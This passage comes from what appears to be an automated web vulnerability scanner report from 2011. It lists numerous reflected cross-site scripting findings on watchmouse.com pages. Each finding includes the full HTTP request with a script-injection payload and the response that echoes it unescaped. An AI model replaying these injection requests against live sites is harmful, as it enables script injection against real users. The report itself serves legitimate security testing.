Pragma: no-cache
Last-Modified:
ETag: "0-en-7c4fed7fd6c164264714f6adb90eda0a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/press.phpa9964"><script>alert(1)</script>b39620f6cf2" method="post">
...[SNIP]...

1.199. http://www.watchmouse.com/en/press.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/press.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67409"><script>alert(1)</script>034afc75996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/press.php?67409"><script>alert(1)</script>034afc75996=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:46 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bb89ff507fa5a3cf96bf1248ac4be8f2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/press.php?67409"><script>alert(1)</script>034afc75996=1" method="post">
...[SNIP]...

1.200. http://www.watchmouse.com/en/privacy.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/privacy.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9ae"><script>alert(1)</script>164cd255052 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en3d9ae"><script>alert(1)</script>164cd255052/privacy.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f8bc1ed8a9301bfe52aa0bd5144ea7bc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en3d9ae"><script>alert(1)</script>164cd255052/privacy.php" method="post">
...[SNIP]...

1.201. http://www.watchmouse.com/en/privacy.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/privacy.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e30e1"><script>alert(1)</script>dd0044f42cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/privacy.phpe30e1"><script>alert(1)</script>dd0044f42cc HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1529a80f067e72d1a9430f3233968cae"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/privacy.phpe30e1"><script>alert(1)</script>dd0044f42cc" method="post">
...[SNIP]...

1.202. http://www.watchmouse.com/en/privacy.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/privacy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35df3"><script>alert(1)</script>039787c73ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/privacy.php?35df3"><script>alert(1)</script>039787c73ab=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-049957ca75d393923b99c2fc377aa776"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/privacy.php?35df3"><script>alert(1)</script>039787c73ab=1" method="post">
...[SNIP]...

1.203. http://www.watchmouse.com/en/register.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392fe"><script>alert(1)</script>793e583b02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en392fe"><script>alert(1)</script>793e583b02/register.php?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:04:23 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-7ddd0568df3c92acdbbb09a302e819a1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en392fe"><script>alert(1)</script>793e583b02/register.php?vpackid=35" method="post">
...[SNIP]...

1.204. http://www.watchmouse.com/en/register.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f442"><script>alert(1)</script>da39ee4718 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/register.php9f442"><script>alert(1)</script>da39ee4718?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:04:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a9d847e82e054d5be22fabf1e05b5637"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/register.php9f442"><script>alert(1)</script>da39ee4718?vpackid=35" method="post">
...[SNIP]...

1.205. http://www.watchmouse.com/en/register.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc9b5"><script>alert(1)</script>a8fde59d62a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/register.php?vpackid=35&bc9b5"><script>alert(1)</script>a8fde59d62a=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:04:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2994ce7531d329ecfcd833020b1dd128"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 25757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<a href="/nl/register.php?vpackid=35&bc9b5"><script>alert(1)</script>a8fde59d62a=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.206. http://www.watchmouse.com/en/releases.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/releases.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26362"><script>alert(1)</script>b23c49f8722 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en26362"><script>alert(1)</script>b23c49f8722/releases.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2b60d47f944aae9ef40f67f13af9bed3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en26362"><script>alert(1)</script>b23c49f8722/releases.php" method="post">
...[SNIP]...

1.207. http://www.watchmouse.com/en/releases.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/releases.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc683"><script>alert(1)</script>5891b6e46f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/releases.phpcc683"><script>alert(1)</script>5891b6e46f7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b158e131da7dfbd7cd7be82632b0587b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/releases.phpcc683"><script>alert(1)</script>5891b6e46f7" method="post">
...[SNIP]...

1.208. http://www.watchmouse.com/en/releases.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/releases.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf7b"><script>alert(1)</script>fb12fa7fde0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/releases.php?aaf7b"><script>alert(1)</script>fb12fa7fde0=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d89a9dbd067fe5768f6c6582caba5fdb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/releases.php?aaf7b"><script>alert(1)</script>fb12fa7fde0=1" method="post">
...[SNIP]...

1.209. http://www.watchmouse.com/en/resellers.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/resellers.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2814"><script>alert(1)</script>b5997cf7315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enf2814"><script>alert(1)</script>b5997cf7315/resellers.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-aba9c415162a352a3b21ff756db1d8ea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enf2814"><script>alert(1)</script>b5997cf7315/resellers.php" method="post">
...[SNIP]...

1.210. http://www.watchmouse.com/en/resellers.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/resellers.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b6dd"><script>alert(1)</script>eaec2988e25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/resellers.php7b6dd"><script>alert(1)</script>eaec2988e25 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-36d0961770f9c95f3a51c96e1ca5616a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/resellers.php7b6dd"><script>alert(1)</script>eaec2988e25" method="post">
...[SNIP]...

1.211. http://www.watchmouse.com/en/resellers.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/resellers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a7d"><script>alert(1)</script>1799e2b91de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/resellers.php?33a7d"><script>alert(1)</script>1799e2b91de=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-074627af44d454e897c10ddd4da4cc70"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/resellers.php?33a7d"><script>alert(1)</script>1799e2b91de=1" method="post">
...[SNIP]...

1.212. http://www.watchmouse.com/en/scripting.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/scripting.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ac78"><script>alert(1)</script>3ff20eb3e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en2ac78"><script>alert(1)</script>3ff20eb3e24/scripting.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
